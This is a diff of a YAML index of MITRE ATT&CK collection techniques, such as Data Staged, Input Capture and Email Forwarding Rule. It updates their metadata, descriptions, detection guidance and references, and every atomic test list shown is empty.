       description: "Adversaries may access network configuration files to collect
         sensitive data about the device and the network. The network configuration
@@ -39989,8 +40550,6 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1560:
     technique:
@@ -40044,7 +40603,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560
     atomic_tests: []
   T1185:
@@ -40081,7 +40639,7 @@ collection:
         description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
           Retrieved May 24, 2017.
         source_name: cobaltstrike manual
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-25T18:58:15.229Z'
       name: Browser Session Hijacking
       description: |-
         Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -40109,12 +40667,10 @@ collection:
       - Administrator
       - SYSTEM
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -40151,23 +40707,23 @@ collection:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -40200,21 +40756,20 @@ collection:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -40322,12 +40877,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -40338,13 +40892,13 @@ collection:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -40358,6 +40912,7 @@ collection:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -40368,12 +40923,12 @@ collection:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1125:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.205Z'
       name: Video Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -40418,30 +40973,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1125
     atomic_tests: []
   T1213.001:
     technique:
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
-      type: attack-pattern
-      created: '2020-02-14T13:09:51.004Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.001
-        url: https://attack.mitre.org/techniques/T1213/001
-      - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
-        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
-          Retrieved April 4, 2018.
-        source_name: Atlassian Confluence Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-30T13:45:42.840Z'
       name: Confluence
       description: |2
 
@@ -40451,31 +40987,48 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
 
         User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+      created: '2020-02-14T13:09:51.004Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/001
+        external_id: T1213.001
+      - source_name: Atlassian Confluence Logging
+        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+          Retrieved April 4, 2018.
+        url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1114.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Email Forwarding Rule'
       description: "Adversaries may setup email forwarding rules to collect sensitive
         information. Adversaries may abuse email forwarding rules to monitor the activities
@@ -40508,10 +41061,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Security
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
       - Liran Ravich, CardinalOps
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -40520,16 +41075,17 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
+      - 'Cloud Service: Cloud Service Metadata'
       type: attack-pattern
       id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
       created: '2020-02-19T18:54:47.103Z'
@@ -40561,70 +41117,66 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.003
     atomic_tests: []
   T1074:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Shane Tully, @securitygypsy
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
-      created: '2017-05-31T21:30:58.938Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074
-        url: https://attack.mitre.org/techniques/T1074
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: PWC Cloud Hopper April 2017
-        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
-        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
-          April 5, 2017.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Data Staged
       description: |-
         Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
 
         In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
 
         Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Data Staged
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      - Shane Tully, @securitygypsy
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+      created: '2017-05-31T21:30:58.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074
+        external_id: T1074
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: PWC Cloud Hopper April 2017
+        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+          April 5, 2017.
+        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -40697,7 +41249,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1039:
@@ -40752,12 +41303,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1039
     atomic_tests: []
   T1114.002:
     technique:
-      modified: '2023-05-31T12:34:03.420Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Remote Email Collection'
       description: Adversaries may target an Exchange server, Office 365, or Google
         Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -40769,6 +41319,9 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
         locations, especially for privileged accounts (ex: Exchange administrator
@@ -40776,11 +41329,11 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -40797,14 +41350,11 @@ collection:
         external_id: T1114.002
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.002
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -40820,6 +41370,7 @@ collection:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -40828,13 +41379,13 @@ collection:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -40842,15 +41393,11 @@ collection:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -40861,9 +41408,60 @@ collection:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1213.004:
+    technique:
+      modified: '2024-10-17T14:36:24.983Z'
+      name: Customer Relationship Management Software
+      description: |-
+        Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+        Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+        CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Centre for Cybersecurity Belgium (CCB)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Logon Session: Logon Session Creation'
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+      created: '2024-07-01T20:06:13.664Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/004
+        external_id: T1213.004
+      - source_name: Bleeping Computer Bank Hack 2020
+        description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+          100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+      - source_name: Bleeping Computer Mint Mobile Hack 2021
+        description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+          after numbers ported, data accessed. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+      - source_name: Bleeping Computer US Cellular Hack 2022
+        description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+          after billing system hack. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -40909,7 +41507,7 @@ collection:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -40928,37 +41526,36 @@ collection:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.003:
     technique:
-      modified: '2022-10-18T22:44:01.723Z'
+      modified: '2024-09-04T13:03:54.101Z'
       name: Code Repositories
       description: |-
         Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
 
-        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
 
         **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Toby Kohlenberg
+      - Josh Liburdi, @jshlbrd
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor access to code repositories, especially performed
         by privileged users such as Active Directory Domain or Enterprise Administrators
         as these types of accounts should generally not be used to access code repositories.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user-based anomalies.
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Toby Kohlenberg
-      - Josh Liburdi, @jshlbrd
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -40981,41 +41578,52 @@ collection:
         url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213:
     technique:
-      modified: '2024-03-01T16:27:47.391Z'
+      modified: '2024-10-28T19:10:16.960Z'
       name: Data from Information Repositories
       description: "Adversaries may leverage information repositories to mine valuable
         information. Information repositories are tools that allow for storage of
         information, typically to facilitate collaboration or information sharing
         between users, and can store a wide variety of data that may aid adversaries
-        in further objectives, or direct access to the target information. Adversaries
-        may also abuse external sharing features to share sensitive documents with
-        recipients outside of the organization. \n\nThe following is a brief list
-        of example information that may hold potential value to an adversary and may
-        also be found on an information repository:\n\n* Policies, procedures, and
-        standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
-        Technical system documentation\n* Testing / development credentials\n* Work
-        / project schedules\n* Source code snippets\n* Links to network shares and
-        other internal resources\n\nInformation stored in a repository may vary based
-        on the specific instance or environment. Specific common information repositories
-        include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
-        and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
-        services such as Code Repositories, IaaS databases, enterprise databases,
-        and other storage infrastructure such as SQL Server."
+        in further objectives, such as Credential Access, Lateral Movement, or Defense
+        Evasion, or direct access to the target information. Adversaries may also
+        abuse external sharing features to share sensitive documents with recipients
+        outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+        \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on an information repository:\n\n*
+        Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+        System architecture diagrams\n* Technical system documentation\n* Testing
+        / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+        \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+        and other internal resources\n* Contact or other sensitive information about
+        business partners and customers, including personally identifiable information
+        (PII) \n\nInformation stored in a repository may vary based on the specific
+        instance or environment. Specific common information repositories include
+        the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+        and more specialized platforms such as customer relationship management (CRM)
+        databases \n* Collaboration platforms such as SharePoint, Confluence, and
+        code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+        \n\nIn some cases, information repositories have been improperly secured,
+        typically by unintentionally allowing for overly-broad access by all users
+        or even public access to unauthenticated users. This is particularly common
+        with cloud-native or cloud-hosted services, such as AWS Relational Database
+        Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+        Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
       kill_chain_phases:
